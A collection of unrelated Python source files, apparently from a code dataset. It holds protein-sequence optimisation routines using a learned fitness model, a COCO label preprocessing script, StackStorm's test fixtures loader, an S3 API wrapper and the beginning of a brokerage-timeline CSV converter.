from https://www.pnas.org/content/pnas/116/18/8852.full.pdf
traditional directed evolution by greedy walk
1. saturation mutagenesis at single position
2. fix optimal mutation
3. repeat for all positions
x = input_seq
for pos i in [0,N-1]:
best_aa optimial AA for pos i
x[i] == best_aa
return x
initial_sequence = sequence of inds (1 x N)
model = model where f(sequence) = y
positions = iterable of positions
"""
cand_seq = torch.from_numpy(initial_sequence).unsqueeze(0)
with torch.no_grad():
initial_fit = model(cand_seq)[0][-1]
cand_traj = np.zeros((len(positions)+1, len(initial_sequence)))
fit_traj = np.zeros((len(positions) + 1))
cand_traj[0] = cand_seq.reshape(-1).numpy()
fit_traj[0] = initial_fit
for indx, pos in enumerate(tqdm(positions)):
# create full expansion at position
cand_seqs = cand_seq.repeat(22, 1)
cand_seqs[:, pos] = torch.arange(22)
# screen expansion
with torch.no_grad():
cand_seqs_fit = model(cand_seqs)[0][-1]
max_fit_aa_indx = cand_seqs_fit.argmax(0)
max_fit = cand_seqs_fit.max()
cand_seq = cand_seqs[max_fit_aa_indx]
cand_traj[indx+1] = cand_seq.reshape(-1).numpy()
fit_traj[indx+1] = max_fit.numpy()
return cand_traj, fit_traj
############################
# MCMC
############################
# Sequence Level
# -------------------------
def model_predict(sequence, model):
model = model.eval()
if type(sequence) == type(np.ones(1)):
sequence = torch.from_numpy(sequence)
sequence = sequence.reshape(1,-1)
with torch.no_grad():
fit = model(sequence)[0][-1].numpy().squeeze()
return fit
def mutate_sequence(sequence, num_mutations):
sequence = sequence.copy()
AA_inds = np.arange(22)
positions = np.random.choice(np.arange(len(sequence)), num_mutations)
for pos in positions:
pos_val = sequence[pos]
if pos_val == 21:
print('mutation in padding region - ignoring')
else:
# change current AA to a new AA
mut_choices = np.ma.masked_where(AA_inds == pos_val, AA_inds)
chosen_mut = np.random.choice(AA_inds[~mut_choices.mask],1)
sequence[pos] = chosen_mut
return sequence
def acceptance_step(curr_fit, prop_fit, T):
"""
returns bool
"""
out_dict = {0: False, 1: True}
# acceptance probability
prob = np.exp(( (prop_fit-curr_fit) / T))
if prob == np.nan:
outcome = 0
else:
prob = min(1,prob)
outcome = np.random.binomial(1, prob)
return out_dict[outcome]
def get_l1_norm(seq1, seq2):
# convert to one-hot
seq1, seq2 = seq1.squeeze(), seq2.squeeze()
seq1 = np.eye(22)[seq1]
seq2 = np.eye(22)[seq2]
l1_norm = LA.norm(seq1 - seq2, 1)
return l1_norm
def metropolisMCMC_sequence(initial_sequence, model, T=0.01, mu=1, trust_radius=15,
N_steps=20):
"""
from pg 24 of low-N
https://www.biorxiv.org/content/10.1101/2020.01.23.917682v2.full.pdf
"""
# start at initial sequence
curr_seq = initial_sequence.numpy()
curr_fit = model_predict(curr_seq, model)
cand_traj = np.zeros( (N_steps, len(initial_sequence) ))
fit_traj = np.zeros((N_steps))
cand_traj[0] = curr_seq.reshape(-1)
fit_traj[0] = curr_fit
# optimization loop
for step_indx in tqdm(range(1,N_steps)):
num_mut = np.random.poisson(mu)
# produce candidate
prop_seq = mutate_sequence(curr_seq, num_mut)
# selection step
if get_l1_norm(prop_seq, curr_seq) < trust_radius: # mut radius
prop_fit = model_predict(prop_seq, model)
if acceptance_step(curr_fit, prop_fit, T):
# print('change accepted')
curr_seq = prop_seq.copy()
curr_fit = prop_fit.copy()
# logging
cand_traj[step_indx] = curr_seq.reshape(-1)
fit_traj[step_indx] = curr_fit
return cand_traj, fit_traj
# Latent space
# -------------------------
def metropolisMCMC_embedding(initial_embedding, oracle,
T=0.01, delta=0.1, N_steps=1000):
"""
MCMC on a continous vector space
proposed candidates come from random direction
"""
embed_dim = initial_embedding.shape[-1]
# start at initial sequence
curr_embedding = initial_embedding.reshape(1,embed_dim)
curr_fit = eval_oracle(curr_embedding, oracle)
print("starting fitness: {}".format(curr_fit))
fitness_list = [curr_fit]
out_embedding_array = np.zeros((N_steps, embed_dim))
out_embedding_array[0] = curr_embedding
# optimization loop
for indx in tqdm(range(1,N_steps)):
prop_embedding = curr_embedding + delta * np.random.randn(embed_dim)
prop_fit = eval_oracle(prop_embedding, oracle)
if acceptance_step(curr_fit,prop_fit, T):
curr_embedding = prop_embedding
curr_fit = prop_fit
# logging
fitness_list.append(curr_fit)
out_embedding_array[indx] = curr_embedding
return out_embedding_array, np.array(fitness_list)
def model_cycle(embedding, model):
"""passes embedding through decoder and encoder
Args:
embedding ([type]): [description]
model ([type]): [description]
"""
with torch.no_grad():
embedding = torch.from_numpy(embedding).float().reshape(1,-1)
decoded_seq = model.decode(embedding).argmax(1)
re_embed = model.encode(decoded_seq).numpy()
return re_embed
def metropolisMCMC_embedding_cycle(initial_embedding, oracle, model,
T=0.01, delta=0.05, N_steps=1000, perturbation=True):
"""
MCMC on a continous vector space
proposed candidates come from random direction
"""
embed_dim = initial_embedding.shape[-1]
# start at initial sequence
curr_embedding = initial_embedding.reshape(1,embed_dim)
curr_fit = eval_oracle(curr_embedding, oracle)
print("starting fitness: {}".format(curr_fit))
fitness_list = [curr_fit]
out_embedding_array = np.zeros((N_steps, embed_dim))
out_embedding_array[0] = curr_embedding
# optimization loop
for indx in tqdm(range(1,N_steps)):
# perturbation step
if perturbation:
prop_embedding = curr_embedding + delta * np.random.randn(embed_dim)
prop_embedding = model_cycle(prop_embedding, model)
else:
prop_embedding = model_cycle(curr_embedding, model)
prop_fit = eval_oracle(prop_embedding, oracle)
if acceptance_step(curr_fit,prop_fit, T):
curr_embedding = prop_embedding
curr_fit = prop_fit
# logging
fitness_list.append(curr_fit)
out_embedding_array[indx] = curr_embedding
return out_embedding_array, np.array(fitness_list)
############################
# Hill Climbing
############################
def get_knn_directions(dataset, current_point, k):
dists_to_initial_point = distance.cdist(current_point.reshape(1,-1), dataset).flatten()
knn = [dataset[x] for x in np.argsort(dists_to_initial_point)[:k]]
return knn
def get_steepest_neighbor(neighbors, oracle):
fitness_values = np.array([eval_oracle(x, oracle) for x in neighbors])
steepest_neighbor = neighbors[fitness_values.argmax()]
return steepest_neighbor, max(fitness_values)
def get_stochastic_steepest_neighbor(neighbors, oracle, curr_fit):
fitness_values = np.array([eval_oracle(x, oracle) for x in neighbors])
incline_inds = np.arange(len(fitness_values))[fitness_values > curr_fit]
if len(incline_inds) == 0:
all_inds = np.arange(len(fitness_values))
choice_ind = np.random.choice(all_inds, 1)[0]
else:
choice_ind = np.random.choice(incline_inds, 1)[0]
choice_neighbor = neighbors[choice_ind]
choice_fit = fitness_values[choice_ind]
return choice_neighbor, choice_fit
def nn_hill_climbing_embedding(initial_embedding, oracle, dataset_embeddings,
step_interp=0.5, k_neighbors=30, N_steps=1000, stochastic=False):
"""[summary]
Args:
initial_embedding ([type]): [description]
oracle ([type]): [description]
step_interp ([type]): [description]
N_steps ([type]): [description]
"""
embed_dim = initial_embedding.shape[-1]
curr_embedding = initial_embedding.reshape(1,embed_dim)
curr_fit = eval_oracle(curr_embedding, oracle)
print("starting fitness: {}".format(curr_fit))
fitness_list = [curr_fit]
out_embedding_array = np.zeros((N_steps, embed_dim))
out_embedding_array[0] = curr_embedding
for indx in tqdm(range(1,N_steps)):
# search step
k_directions = get_knn_directions(dataset_embeddings, curr_embedding, k_neighbors )
if stochastic:
next_neighbor, next_fitness = get_stochastic_steepest_neighbor(k_directions, oracle, curr_fit)
else:
next_neighbor, next_fitness = get_steepest_neighbor(k_directions, oracle)
next_direction = next_neighbor - curr_embedding
# update step
curr_embedding += step_interp * next_direction
curr_fit = next_fitness
# logging
out_embedding_array[indx] = curr_embedding
fitness_list.append(curr_fit)
return out_embedding_array, np.array(fitness_list)
############################
# Gradient Methods
############################
# TODO: convert to py class
def grad_ascent(initial_embedding, train_embeddings,
train_data, model, N_steps, lr, cycle=False):
#need to pass the sequence through the network layers for gradient to be taken, so cycle the embedding once
model.requires_grad_(True)
grad_list = []
# data logging
embed_dim = initial_embedding.shape[-1]
out_embedding_array = np.zeros((N_steps, embed_dim))
out_fit_array = np.zeros((N_steps))
# initial step
curr_embedding = torch.tensor(initial_embedding, requires_grad=True).reshape(-1, embed_dim)
curr_fit = model.regressor_module(curr_embedding)
print("starting fitness: {}".format(curr_fit))
# save step 0 info
out_embedding_array[0] = curr_embedding.reshape(1,embed_dim).detach().numpy()
out_fit_array[0] = curr_fit.detach().numpy()
assert curr_embedding.requires_grad
for step in tqdm(range(1,N_steps)):
model.train()
grad = torch.autograd.grad(curr_fit, curr_embedding)[0] # get gradient
grad_list.append(grad.detach())
# update step
update_step = grad * lr
curr_embedding += update_step
# cycle bool
model = model.eval()
if cycle:
nseq = model.decode(curr_embedding).argmax(1)
curr_embedding = model.encode(nseq)
curr_fit = model.regressor_module(curr_embedding)
# save step i info
out_embedding_array[step] = curr_embedding
out_fit_array[step] = curr_fit.detach().numpy()
return out_embedding_array, out_fit_array, grad_list
| StarcoderdataPython |
6510551 | <gh_stars>1-10
# coding: utf-8
from pycocotools.coco import COCO
import argparse
import numpy as np
import skimage.io as io
import matplotlib.pyplot as plt
import pylab
import os, os.path
import pickle
from tqdm import tqdm
parser = argparse.ArgumentParser(description="Preprocess COCO Labels.")
#dataDir='/share/data/vision-greg/coco'
#which dataset to extract options are [all, train, val, test]
#dataset = "all"
parser.add_argument("dir", type=str, default="../datasets/coco/",
help="where is the coco dataset located.")
parser.add_argument("--save_dir", type=str, default="./datasets/coco/",
help="where to save the coco labels.")
parser.add_argument("-d", "--dataset", type=str, default="all",
choices=["all", "train", "val", "test"],
help="which coco partition to create the multilabel set"
"for the options [all, train, val, test] default is all")
args = parser.parse_args()
def save_obj(obj, name):
with open( name + '.pkl', 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def load_obj(name ):
with open(name + '.pkl', 'rb') as f:
return pickle.load(f)
def wrrite(fname, d):
fout = open(fname, 'w')
for i in range(len(d)):
fout.write(d[i] +'\n')
fout.close()
def load(fname):
data = []
labels = []
for line in open(fname).readlines():
l = line.strip().split(' ')
data.append(l[0])
labels.append(int(l[1]))
return data,np.array(labels,dtype=np.int32)
def load_labels(img_names, root_dir, dataset, coco, idmapper):
labels = {}
for i in tqdm(range(len(img_names))):
#print(i, dataset)
#print(img_names[i], img_names[i][18:-4])
# Hack to extract the image id from the image name
if dataset == "val":
imgIds=int(img_names[i][18:-4])
else:
imgIds=int(img_names[i][19:-4])
annIds = coco.getAnnIds(imgIds=imgIds, iscrowd=None)
anns = coco.loadAnns(annIds)
c = []
for annot in anns:
c.append(idmapper[annot['category_id']])
if not c:
c = np.array(-1)
labels[root_dir + '/' + img_names[i]] = np.unique(c)
return labels
def load_image_names(root_dir):
DIR = root_dir
#print(DIR)
img_names = [name for name in os.listdir(DIR) if os.path.isfile(os.path.join(DIR, name))]
return img_names
def load_annotations(dataDir, dataType):
annFile='%s/annotations/instances_%s.json'%(dataDir, dataType)
# initialize COCO api for instance annotations
coco=COCO(annFile)
# display COCO categories and supercategories
cats = coco.loadCats(coco.getCatIds())
nms=[cat['id'] for cat in cats]
idmapper = {}
for i in range(len(nms)):
idmapper[nms[i]] = i
return coco, idmapper
root_dir = args.dir + "/train2014"
train_img_names = load_image_names(root_dir)
root_dir = args.dir + "/val2014"
val_img_names = load_image_names(root_dir)
if args.dataset == "test" or args.dataset == "all":
root_dir = args.dir + "test2014"
test_img_names = load_image_names(root_dir)
d = {}
for i in range(len(test_img_names)):
d[i] = root_dir + '/' + test_img_names[i]
LIST = args.save_dir + 'test2014imgs.txt'
wrrite(LIST,d)
if args.dataset == "all":
root_dir = args.dir + "train2014"
coco, idmapper = load_annotations(args.dir, "train2014")
labels = load_labels(train_img_names, root_dir, "train", coco, idmapper)
save_obj(labels, args.save_dir + "/multi-label-train2014")
LIST = args.save_dir + "train2014imgs.txt"
wrrite(LIST, train_img_names)
root_dir = args.dir + "val2014"
coco, idmapper = load_annotations(args.dir, "val2014")
labels = load_labels(val_img_names, root_dir, "val", coco, idmapper)
save_obj(labels, args.save_dir + "/multi-label-val2014")
LIST = args.save_dir + "/val2014imgs.txt"
wrrite(LIST, val_img_names)
elif args.dataset == 'val':
root_dir = args.dir + "val2014"
coco, idmapper = load_annotations(root_dir)
labels = load_labels(val_img_names, root_dir, "val", coco, idmapper)
save_obj(labels, args.save_dir + "/multi-label-val2014")
LIST = args.save_dir + "/val2014imgs.txt"
wrrite(LIST, val_img_names)
elif args.dataset == 'train':
root_dir = args.dir + "/train2014"
coco, idmapper = load_annotations(root_dir)
labels = load_labels(train_img_names, root_dir, "train", coco, idmapper)
save_obj(labels, args.save_dir + "/multi-label-train2014")
LIST = args.save_dir + "/train2014imgs.txt"
wrrite(LIST, train_img_names)
# For image segmentaion
# converting polygon and RLE to binary mask
#labels = {}
#for i in range(len(imgsname)):
# print(i)
# if val == True:
# imgIds=int(imgsname[i][19:25])
# else:
# imgIds=int(imgsname[i][21:27])
# annIds = coco.getAnnIds(imgIds=imgIds, iscrowd=None)
# anns = coco.loadAnns(annIds)
# for annot in anns:
# cmask_partial = coco.annToMask(annot)
#
| StarcoderdataPython |
4956576 | <filename>st2tests/st2tests/fixturesloader.py
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import copy
import os
import six
from st2common.content.loader import MetaLoader
from st2common.models.api.action import (ActionAPI, LiveActionAPI, ActionExecutionStateAPI,
RunnerTypeAPI, ActionAliasAPI)
from st2common.models.api.auth import ApiKeyAPI, UserAPI
from st2common.models.api.execution import (ActionExecutionAPI)
from st2common.models.api.policy import (PolicyTypeAPI, PolicyAPI)
from st2common.models.api.rule import (RuleAPI)
from st2common.models.api.rule_enforcement import RuleEnforcementAPI
from st2common.models.api.sensor import SensorTypeAPI
from st2common.models.api.trace import TraceAPI
from st2common.models.api.trigger import (TriggerAPI, TriggerTypeAPI, TriggerInstanceAPI)
from st2common.models.db.action import ActionDB
from st2common.models.db.actionalias import ActionAliasDB
from st2common.models.db.auth import ApiKeyDB, UserDB
from st2common.models.db.liveaction import LiveActionDB
from st2common.models.db.executionstate import ActionExecutionStateDB
from st2common.models.db.runner import RunnerTypeDB
from st2common.models.db.execution import (ActionExecutionDB)
from st2common.models.db.policy import (PolicyTypeDB, PolicyDB)
from st2common.models.db.rule import RuleDB
from st2common.models.db.rule_enforcement import RuleEnforcementDB
from st2common.models.db.sensor import SensorTypeDB
from st2common.models.db.trace import TraceDB
from st2common.models.db.trigger import (TriggerDB, TriggerTypeDB, TriggerInstanceDB)
from st2common.persistence.action import Action
from st2common.persistence.actionalias import ActionAlias
from st2common.persistence.execution import ActionExecution
from st2common.persistence.executionstate import ActionExecutionState
from st2common.persistence.auth import ApiKey, User
from st2common.persistence.liveaction import LiveAction
from st2common.persistence.runner import RunnerType
from st2common.persistence.policy import (PolicyType, Policy)
from st2common.persistence.rule import Rule
from st2common.persistence.rule_enforcement import RuleEnforcement
from st2common.persistence.sensor import SensorType
from st2common.persistence.trace import Trace
from st2common.persistence.trigger import (Trigger, TriggerType, TriggerInstance)
ALLOWED_DB_FIXTURES = ['actions', 'actionstates', 'aliases', 'executions', 'liveactions',
'policies', 'policytypes', 'rules', 'runners', 'sensors',
'triggertypes', 'triggers', 'triggerinstances', 'traces', 'apikeys',
'users', 'enforcements']
ALLOWED_FIXTURES = copy.copy(ALLOWED_DB_FIXTURES)
ALLOWED_FIXTURES.extend(['actionchains', 'workflows'])
FIXTURE_DB_MODEL = {
'actions': ActionDB,
'aliases': ActionAliasDB,
'actionstates': ActionExecutionStateDB,
'apikeys': ApiKeyDB,
'enforcements': RuleEnforcementDB,
'executions': ActionExecutionDB,
'liveactions': LiveActionDB,
'policies': PolicyDB,
'policytypes': PolicyTypeDB,
'rules': RuleDB,
'runners': RunnerTypeDB,
'sensors': SensorTypeDB,
'traces': TraceDB,
'triggertypes': TriggerTypeDB,
'triggers': TriggerDB,
'triggerinstances': TriggerInstanceDB,
'users': UserDB
}
FIXTURE_API_MODEL = {
'actions': ActionAPI,
'aliases': ActionAliasAPI,
'actionstates': ActionExecutionStateAPI,
'apikeys': ApiKeyAPI,
'enforcements': RuleEnforcementAPI,
'executions': ActionExecutionAPI,
'liveactions': LiveActionAPI,
'policies': PolicyAPI,
'policytypes': PolicyTypeAPI,
'rules': RuleAPI,
'runners': RunnerTypeAPI,
'sensors': SensorTypeAPI,
'traces': TraceAPI,
'triggertypes': TriggerTypeAPI,
'triggers': TriggerAPI,
'triggerinstances': TriggerInstanceAPI,
'users': UserAPI
}
FIXTURE_PERSISTENCE_MODEL = {
'actions': Action,
'aliases': ActionAlias,
'actionstates': ActionExecutionState,
'apikeys': ApiKey,
'enforcements': RuleEnforcement,
'executions': ActionExecution,
'liveactions': LiveAction,
'policies': Policy,
'policytypes': PolicyType,
'rules': Rule,
'runners': RunnerType,
'sensors': SensorType,
'traces': Trace,
'triggertypes': TriggerType,
'triggers': Trigger,
'triggerinstances': TriggerInstance,
'users': User
}
GIT_SUBMODULES_NOT_CHECKED_OUT_ERROR = """
Git submodule "%s" is not checked out. Make sure to run "git submodule update --init
--recursive" in the repository root directory to check out all the
submodules.
""".replace('\n', '').strip()
def get_fixtures_base_path():
return os.path.join(os.path.dirname(__file__), 'fixtures')
def get_fixtures_packs_base_path():
return os.path.join(os.path.dirname(__file__), 'fixtures/packs')
def get_resources_base_path():
return os.path.join(os.path.dirname(__file__), 'resources')
class FixturesLoader(object):
def __init__(self):
self.meta_loader = MetaLoader()
def save_fixtures_to_db(self, fixtures_pack='generic', fixtures_dict=None,
use_object_ids=False):
"""
Loads fixtures specified in fixtures_dict into the database
and returns DB models for the fixtures.
fixtures_dict should be of the form:
{
'actions': ['action-1.yaml', 'action-2.yaml'],
'rules': ['rule-1.yaml'],
'liveactions': ['execution-1.yaml']
}
:param fixtures_pack: Name of the pack to load fixtures from.
:type fixtures_pack: ``str``
:param fixtures_dict: Dictionary specifying the fixtures to load for each type.
:type fixtures_dict: ``dict``
:param use_object_ids: Use object id primary key from fixture file (if available) when
storing objects in the database. By default id in
file is discarded / not used and a new random one
is generated.
:type use_object_ids: ``bool``
:rtype: ``dict``
"""
if fixtures_dict is None:
fixtures_dict = {}
fixtures_pack_path = self._validate_fixtures_pack(fixtures_pack)
self._validate_fixture_dict(fixtures_dict, allowed=ALLOWED_DB_FIXTURES)
db_models = {}
for fixture_type, fixtures in six.iteritems(fixtures_dict):
API_MODEL = FIXTURE_API_MODEL.get(fixture_type, None)
PERSISTENCE_MODEL = FIXTURE_PERSISTENCE_MODEL.get(fixture_type, None)
loaded_fixtures = {}
for fixture in fixtures:
# Guard against copy and type and similar typos
if fixture in loaded_fixtures:
msg = 'Fixture "%s" is specified twice, probably a typo.' % (fixture)
raise ValueError(msg)
fixture_dict = self.meta_loader.load(
self._get_fixture_file_path_abs(fixtures_pack_path, fixture_type, fixture))
api_model = API_MODEL(**fixture_dict)
db_model = API_MODEL.to_model(api_model)
# Make sure we also set and use object id if that functionality is used
if use_object_ids and 'id' in fixture_dict:
db_model.id = fixture_dict['id']
db_model = PERSISTENCE_MODEL.add_or_update(db_model)
loaded_fixtures[fixture] = db_model
db_models[fixture_type] = loaded_fixtures
return db_models
def load_fixtures(self, fixtures_pack='generic', fixtures_dict=None):
"""
Loads fixtures specified in fixtures_dict. We
simply want to load the meta into dict objects.
fixtures_dict should be of the form:
{
'actionchains': ['actionchain1.yaml', 'actionchain2.yaml'],
'workflows': ['workflow.yaml']
}
:param fixtures_pack: Name of the pack to load fixtures from.
:type fixtures_pack: ``str``
:param fixtures_dict: Dictionary specifying the fixtures to load for each type.
:type fixtures_dict: ``dict``
:rtype: ``dict``
"""
if not fixtures_dict:
return {}
fixtures_pack_path = self._validate_fixtures_pack(fixtures_pack)
self._validate_fixture_dict(fixtures_dict)
all_fixtures = {}
for fixture_type, fixtures in six.iteritems(fixtures_dict):
loaded_fixtures = {}
for fixture in fixtures:
fixture_dict = self.meta_loader.load(
self._get_fixture_file_path_abs(fixtures_pack_path, fixture_type, fixture))
loaded_fixtures[fixture] = fixture_dict
all_fixtures[fixture_type] = loaded_fixtures
return all_fixtures
def load_models(self, fixtures_pack='generic', fixtures_dict=None):
"""
Loads fixtures specified in fixtures_dict as db models. This method must be
used for fixtures that have associated DB models. We simply want to load the
meta as DB models but don't want to save them to db.
fixtures_dict should be of the form:
{
'actions': ['action-1.yaml', 'action-2.yaml'],
'rules': ['rule-1.yaml'],
'liveactions': ['execution-1.yaml']
}
:param fixtures_pack: Name of the pack to load fixtures from.
:type fixtures_pack: ``str``
:param fixtures_dict: Dictionary specifying the fixtures to load for each type.
:type fixtures_dict: ``dict``
:rtype: ``dict``
"""
if not fixtures_dict:
return {}
fixtures_pack_path = self._validate_fixtures_pack(fixtures_pack)
self._validate_fixture_dict(fixtures_dict, allowed=ALLOWED_DB_FIXTURES)
all_fixtures = {}
for fixture_type, fixtures in six.iteritems(fixtures_dict):
API_MODEL = FIXTURE_API_MODEL.get(fixture_type, None)
loaded_models = {}
for fixture in fixtures:
fixture_dict = self.meta_loader.load(
self._get_fixture_file_path_abs(fixtures_pack_path, fixture_type, fixture))
api_model = API_MODEL(**fixture_dict)
db_model = API_MODEL.to_model(api_model)
loaded_models[fixture] = db_model
all_fixtures[fixture_type] = loaded_models
return all_fixtures
def delete_fixtures_from_db(self, fixtures_pack='generic', fixtures_dict=None,
raise_on_fail=False):
"""
Deletes fixtures specified in fixtures_dict from the database.
fixtures_dict should be of the form:
{
'actions': ['action-1.yaml', 'action-2.yaml'],
'rules': ['rule-1.yaml'],
'liveactions': ['execution-1.yaml']
}
:param fixtures_pack: Name of the pack to delete fixtures from.
:type fixtures_pack: ``str``
:param fixtures_dict: Dictionary specifying the fixtures to delete for each type.
:type fixtures_dict: ``dict``
:param raise_on_fail: Optional If True, raises exception if delete fails on any fixture.
:type raise_on_fail: ``boolean``
"""
if not fixtures_dict:
return
fixtures_pack_path = self._validate_fixtures_pack(fixtures_pack)
self._validate_fixture_dict(fixtures_dict)
for fixture_type, fixtures in six.iteritems(fixtures_dict):
API_MODEL = FIXTURE_API_MODEL.get(fixture_type, None)
PERSISTENCE_MODEL = FIXTURE_PERSISTENCE_MODEL.get(fixture_type, None)
for fixture in fixtures:
fixture_dict = self.meta_loader.load(
self._get_fixture_file_path_abs(fixtures_pack_path, fixture_type, fixture))
# Note that when we have a reference mechanism consistent for
# every model, we can just do a get and delete the object. Until
# then, this model conversions are necessary.
api_model = API_MODEL(**fixture_dict)
db_model = API_MODEL.to_model(api_model)
try:
PERSISTENCE_MODEL.delete(db_model)
except:
if raise_on_fail:
raise
def delete_models_from_db(self, models_dict, raise_on_fail=False):
"""
Deletes models specified in models_dict from the database.
models_dict should be of the form:
{
'actions': [ACTION1, ACTION2],
'rules': [RULE1],
'liveactions': [EXECUTION]
}
:param fixtures_dict: Dictionary specifying the fixtures to delete for each type.
:type fixtures_dict: ``dict``.
:param raise_on_fail: Optional If True, raises exception if delete fails on any model.
:type raise_on_fail: ``boolean``
"""
for model_type, models in six.iteritems(models_dict):
PERSISTENCE_MODEL = FIXTURE_PERSISTENCE_MODEL.get(model_type, None)
for model in models:
try:
PERSISTENCE_MODEL.delete(model)
except:
if raise_on_fail:
raise
def _validate_fixtures_pack(self, fixtures_pack):
fixtures_pack_path = self._get_fixtures_pack_path(fixtures_pack)
if not self._is_fixture_pack_exists(fixtures_pack_path):
raise Exception('Fixtures pack not found ' +
'in fixtures path %s.' % get_fixtures_base_path())
return fixtures_pack_path
def _validate_fixture_dict(self, fixtures_dict, allowed=ALLOWED_FIXTURES):
fixture_types = list(fixtures_dict.keys())
for fixture_type in fixture_types:
if fixture_type not in allowed:
raise Exception('Disallowed fixture type: %s' % fixture_type)
def _is_fixture_pack_exists(self, fixtures_pack_path):
return os.path.exists(fixtures_pack_path)
def _get_fixture_file_path_abs(self, fixtures_pack_path, fixtures_type, fixture_name):
return os.path.join(fixtures_pack_path, fixtures_type, fixture_name)
def _get_fixtures_pack_path(self, fixtures_pack_name):
return os.path.join(get_fixtures_base_path(), fixtures_pack_name)
def get_fixture_file_path_abs(self, fixtures_pack, fixtures_type, fixture_name):
return os.path.join(get_fixtures_base_path(), fixtures_pack, fixtures_type, fixture_name)
def assert_submodules_are_checked_out():
"""
Function which verifies that user has ran "git submodule update --init --recursive" in the
root of the directory and that the "st2tests/st2tests/fixtures/packs/test" git repo submodule
used by the tests is checked out.
"""
pack_path = os.path.join(get_fixtures_packs_base_path(), 'test_content_version/')
pack_path = os.path.abspath(pack_path)
submodule_git_dir_or_file_path = os.path.join(pack_path, '.git')
# NOTE: In newer versions of git, that .git is a file and not a directory
if not os.path.exists(submodule_git_dir_or_file_path):
raise ValueError(GIT_SUBMODULES_NOT_CHECKED_OUT_ERROR % (pack_path))
return True
| StarcoderdataPython |
8018654 | <gh_stars>1-10
from pathlib import PosixPath
import botocore
from ..util.log import Log, log_call
from .client import with_client
_log = Log('s3.api')
@with_client
@log_call('s3.api', 'Making api call `{func}` {kwargs}')
def ls(client, bucket = None):
if bucket is None:
_log.debug("Bucket not provided, listing user's buckets")
yield client.list_buckets()
else:
_log.debug('Bucket provided, listing objects in s3://%s'%bucket)
next_marker = None
is_truncated = True
while is_truncated:
if next_marker:
_log.debug('Fetching next page for %s'%bucket)
page = client.list_objects(Bucket=bucket, Marker=next_marker)
else:
page = client.list_objects(Bucket=bucket)
yield page
is_truncated = page.get('IsTruncated', False)
next_marker = page.get('NextMarker', None)
if is_truncated and next_marker is None:
next_marker = page['Contents'][-1]['Key']
@with_client
@log_call('s3.api', 'Making api call `{func}` {kwargs}')
def lv(client, bucket = None, key = None):
if key is None:
prefix = ''
_log.debug('No prefix provided, defaulting to empty string')
else:
prefix = key
_log.debug('Using prefix `%s`'%prefix)
is_truncated = True
next_marker = None
next_version = None
while is_truncated:
if next_marker is not None and next_version is not None:
_log.debug('Fetching next page for %s'%bucket)
page = client.list_object_versions(
Bucket=bucket,
Prefix=prefix,
KeyMarker=next_marker,
VersionIdMarker=next_version
)
else:
page = client.list_object_versions(
Bucket=bucket,
Prefix=prefix
)
yield page
is_truncated = page.get('IsTruncated', False)
next_marker = page.get('NextKeyMarker', None)
next_version = page.get('NextVersionIdMarker', None)
@with_client
@log_call('s3.api', 'Making api call `{func}` {kwargs}')
def head(client, bucket = None, key = None, version_id = None):
if version_id is None:
_log.debug('No VersionId provided, HEADing %s'%key)
return client.head_object(Bucket=bucket, Key=key)
_log.debug('Got VersionId HEADing %s ver: %s'%(key, version_id))
return client.head_object(Bucket=bucket, Key=key, VersionId=version_id)
@with_client
@log_call('s3.api', 'Making api call `{func}` {kwargs}')
def get(client, bucket = None, key = None, version_id = None):
kwargs = dict(Bucket=bucket, Key=key)
if version_id is None:
_log.debug('No VersionId provided, GET s3://%s/%s'%(bucket, key))
return client.get_object(Bucket=bucket, Key=key)
_log.debug('Got VersionId provided, GET s3://%s/%s ver: %s'%(bucket, key, version_id))
return client.get_object(Bucket=bucket, Key=key, VersionId=version_id)
@with_client
def put(client, bucket = None, key = None):
pass
@with_client
def cp(client, target_bucket = None, target_key = None, bucket = None, key = None):
pass
@with_client
@log_call('s3.api', 'Making api call `{func}` {kwargs}')
def get_bucket_replication(client, bucket = None):
try:
_log.debug('Getting ReplicationConfig for %s'%bucket)
return client.get_bucket_replication(Bucket=bucket)
except botocore.exceptions.ClientError:
pass
return None
| StarcoderdataPython |
3352981 | import json
import re
from datetime import datetime
# Read my timeline
with open('myTimeline.json', 'r', encoding='utf-8') as f:
timeline = json.loads(f.read())
# Read stock JSON data
with open('../LS/isins.json', 'r', encoding='utf-8') as f:
lsIsins = json.loads(f.read())
# All stocks crawled from TR
with open('allStocks.json', 'r', encoding='utf-8') as f:
allStocks = json.loads(f.read())
companyNames = {}
for stock in allStocks:
companyNames[stock["company"]["name"]] = stock["isin"]
# Fixed ISINs
with open('companyNameIsins.json', 'r', encoding='utf-8') as f:
fixedIsins = json.loads(f.read())
# Extract decimal number in a string
def getDecimalFromString(inputString):
try:
numbers = re.findall('[-+]?\d.*\,\d+|\d+', inputString)
return numbers[0].replace(".","").replace(",",".")
except:
return None
return None
# Unify a company name to compare
# Trade Republic uses different company names. This makes it very hard to map the timeline events to companies.
# @TradeRepublic: Please add ISIN in timeline event JSON
def unifyCompanyName(inputString):
unify = ''.join(e for e in inputString if e.isalnum()).lower()
return unify
# Return ISIN from company name. Uses the JSON object from isins.json
# Returns None, if no ISIN found
def getIsinFromStockName(stockName):
try:
return companyNames[stockName]
except:
try:
# Try to get the ISIN from the fixed list
return fixedIsins[stockName]
except:
stockNameUnify = unifyCompanyName(stockName)
for stock in lsIsins:
try:
isin = stock[1]
name = stock[2]
nameUnify = unifyCompanyName(stock[2])
if stockNameUnify in nameUnify:
return isin
except:
continue
return ""
# Portfolio Performance transaction types
# Kauf, Einlage, Verkauf, Zinsen, Gebühren, Dividende, Umbuchung (Eingang), Umbuchung (Ausgang)
missingIsins = {}
# Write transactions.csv file
# date, transaction, shares, amount, total, fee, isin, name
with open('myTransactions.csv', 'w') as f:
f.write("Datum;Typ;Stück;amount;Wert;Gebühren;ISIN;name\n")
for event in timeline:
event = event["data"]
dateTime = datetime.fromtimestamp(int(event["timestamp"]/1000))
date = dateTime.strftime("%Y-%m-%d")
title = event["title"]
try:
body = event["body"]
except:
body = ""
if "storniert" in body:
continue
